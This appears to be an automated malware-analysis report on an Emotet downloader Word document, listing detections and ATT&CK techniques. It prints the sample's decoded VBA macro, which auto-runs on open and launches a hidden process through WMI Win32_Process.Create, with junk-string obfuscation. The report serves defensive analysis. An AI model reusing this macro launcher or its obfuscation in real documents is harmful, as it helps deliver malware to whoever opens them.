Verdict: MALICIOUS (Risk Score: 250)
Malware Insights
MITRE ATT&CK techniques:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
- T1059 Command and Scripting Interpreter
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-10001946-0. Critical heuristics indicate the presence of VBA macros that use CreateObject and WMI (Win32_Process.Create) to launch processes, a common technique for downloading and executing further stages. The autoopen macro suggests an immediate execution upon opening the document.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  Matched line in script: `Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654")))) CreateObject(("winmg" _ + "mts:Win" + _`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script: `Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654")))) CreateObject(("winmg" _ + "mts:Win" + _`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: `Sub _ autoopen( _ )`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5995 bytes | 5d4cad9fe770ba36aad5b61e7a93eb5e917f83422f8111410630cbae9b5a9ae1 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "mSRp5U, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "TDDAinJ, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "kmi5rho, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
'Debug.Print "J2NdVb" + ("401" + ("ZFaBLIHE") + "JGuaIb" + "480") + "rRrrS4QF" + ("wYfuLp") + ("L1zaI3" + "zcaEB2A" + "580" + ("qYHI7Dm") + ("pqWjwuZ" + ("AaIz7p5") + "804" + ("668") + ("GY7ij2" + ("19"))))
Debug.Print "vvwQT_" + ("964" + ("hVnmZj1h") + "YPHYLsc" + "407") + "C7siKrPn" + ("wrQ6BFi") + ("Sp02jc2z" + "c3kNv2s" + "628" + ("lTNpijz") + ("SGJ7bZ" + ("EJBT54") + "8" + ("321") + ("YfEUdaE" + ("254"))))
zQoAY9
'Debug.Print "tXYb_4p" + ("77" + ("nC6Wvrf") + "VG8nh2Vo" + "429") + "nivKO_D5" + ("NoPOMQz") + ("M8Ajkb8" + "ioOOKOqN" + "286" + ("nnlsGK") + ("VVkjA3qw" + ("ItSQNT") + "225" + ("371") + ("Bi00Bjw" + ("620"))))
Debug.Print "Va_QUj" + ("9" + ("Tfa7LH") + "ZaSiuJ0p" + "869") + "bfDCccm" + ("B8rSIJo_") + ("o3_qTMC" + "NAlcJZjt" + "308" + ("YkWSwjtA") + ("a_DQkuh" + ("rZo8itbi") + "540" + ("889") + ("RinINfr" + ("883"))))
End Sub
Attribute VB_Name = "ZwnVj8f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "iWVonii"
Attribute VB_Name = "mL1BzLs"
Attribute VB_Name = "RaEc_4X"
Attribute VB_Name = "YzuOl2cL"
Attribute VB_Name = "HXA_3V"
Attribute VB_Name = "oKGSVX"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NNEuOcz"
Function zQoAY9()
'Debug.Print "tIWEIH" + ("689" + ("LCBJPOW") + "k94Ecajj" + "875") + "zwX2uEaz" + ("Rz4uV7i0") + ("uVi9DV" + "wjjP7uoc" + "669" + ("JzkSGWI") + ("Ff0lFs7" + ("VwYRt2") + "845" + ("303") + ("HG4QXilP" + ("328"))))
Debug.Print "i6Vckbl" + ("961" + ("qBOPWC") + "lcwQP2" + "234") + "iDfdlj" + ("uCzJaPV8") + ("DoABjqJ" + "hUqiOWM" + "8" + ("mNcbad_") + ("PMcUjjKk" + ("bzU_0Jf") + "215" + ("555") + ("LPbS8ImN" + ("591"))))
k6S9Oijw = ThisDocument.TDDAinJ + ThisDocument.kmi5rho + ThisDocument.mSRp5U
'Debug.Print "DDNcJ9" + ("504" + ("UWaXlSh") + "VJ20I3J" + "977") + "Yad9u7" + ("ZHwhl_") + ("sYq4QXN" + "GOF6VS" + "181" + ("FG7Zqca") + ("ph4j30" + ("nSrwGN") + "893" + ("702") + ("DJJ1nIK4" + ("908"))))
Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654"))))
CreateObject(("winmg" _
+ "mts:Win" + _
"32_Process")).Create# k6S9Oijw, fCtpUw8, nBhMkp, OAYAEN
'Debug.Print "MnzmVFD" + ("536" + ("i9tqXAK") + "dGha2_IY" + "495") + "j89Wiwt" + ("H6KDhJ") + ("w5ozSCoi" + "wmNsji" + "251" + ("zWMkRhcp") + ("Y5rDNdlZ" + ("vUzwlvA") + "961" + ("438") + ("pob8ktUW" + ("278"))))
Debug.Print "wmOUSj_" + ("237" + ("Yfzpib") + "bfOTQqP" + "249") + "mRCfjhW" + ("Ocb9MXm") + ("jSCSU1" + "IpWiECd" + "369" + ("B07STV5t") + ("bB8pWF" + ("ib9NvNXr") + "842" + ("976") + ("zlsrkVN" + ("327"))))
End Function
Attribute VB_Name = "fvpzIts"
Function nBhMkp()
'Debug.Print "JHGz4AY" + ("364" + ("joWJTq") + "jRU6X5" + "459") + "NXihaij" + ("uj7nkY") + ("lt1TwZ" + "GMSQvNWM" + "419" + ("fzQJ2iOz") + ("Cs89LK" + ("Oi0wzSSN") + "348" + ("340") + ("mNcZWZ" + ("470"))))
Debug.Print "ohmjiFfW" + ("298" + ("jVJnB1") + "tnM5HHd1" + "254") + "psK3f9W" + ("Kw3Dzn") + ("DzXjZfr" + "hfZFPPz" + "694" + ("Xdpqqkw") + ("nJGilE" + ("IFYMif6") + "303" + ("855") + ("zjCWAS" + ("72"))))
Set nBhMkp = CreateObject(("winmg" _
+ "mts:Win" + "32_Processstar" _
+ "tup"))
'Debug.Print "A9H3pb" + ("831" + ("HfNcnsHE") + "wqfUvWC" + "474") + "Jqii8vi" + ("qUAvOU") + ("PAc95Z" + "bfnWjm9w" + "867" + ("zqf3NYB") + ("z7RAfM" + ("dcSRZma") + "254" + ("858") + ("KWM4h3S" + ("485"))))
Debug.Print "Mk3920" + ("598" + ("tU3fOZZ") + "DFmWBfP" + "933") + "mIMs9U" + ("WTiozBOf") + ("s0dHrua" + "tiWt6Nj" + "492" + ("f6L5h03A") + ("iHjS5E" + ("jccSQzd") + "325" + ("74") + ("WQhv1lb" + ("683"))))
With nBhMkp
'Debug.Print "X5XWWW" + ("451" + ("UZfC2is") + "ZjAtYqDa" + "678") + "tPGVRW" + ("wpaWP4R") + ("M8u8zV" + "ztfsS7qW" + "720" + ("PKvimX") + ("ENw1HW" + ("mWED6D") + "513" + ("281") + ("hntu_jY" + ("134"))))
Debug.Print "ZcIkzG0m" + ("234" + ("SWu8_ob") + "hd3JuW" + "508") + "Mc_V0s" + ("ZOwE5C") + ("PQ_zA4" + "nTAl_2cl" + "626" + ("WX_YBpwJ") + ("JvaHDbG" + ("KXjFlqs") + "691" + ("240") + ("KcfDTsS4" + ("959"))))
. _
ShowWindow = mikjkd7Z + DLm6SZ + whfbNt + qWJNja0 + fBGHNTOa
'Debug.Print "FdPtfjba" + ("495" + ("JfYSPn") + "iZ8jqW" + "223") + "KdSvdn" + ("JNvff1w") + ("IpZnTH" + "BTJ5kX" + "279" + ("LCpis4") + ("DZPlFjLH" + ("dZq4VU") + "576" + ("446") + ("dl2ivWmu" + ("791"))))
Debug.Print "o3wPttk" + ("932" + ("oFKsVdUr") + "Nj3Qdjw2" + "732") + "Q2vzh3o" + ("Ajjszjq") + ("uSCdqLN" + "nK8tMzh" + "462" + ("vwmqEt9") + ("Id84Ac2p" + ("JkkiU4dp") + "283" + ("313") + ("QSQ2lR" + ("609"))))
End With
'Debug.Print "jC__16J" + ("657" + ("pFuils9") + "maVpik" + "975") + "LojjPCa" + ("T4V6h7") + ("dROosi" + "D8WXfa3d" + "729" + ("uO1rDK") + ("is15ZEU" + ("KwfGtmLG") + "75" + ("57") + ("B3LFzs7t" + ("587"))))
Debug.Print "I9IPPC8" + ("304" + ("IR88CKn") + "wG5nn2o" + "818") + "VRGBSVI" + ("wDIvdi3") + ("HuhSE_" + "OUfZlOU" + "942" + ("DPpl6k") + ("c2WaEwQa" + ("qGNHz6Ez") + "84" + ("944") + ("qzsawVjh" + ("826"))))
End Function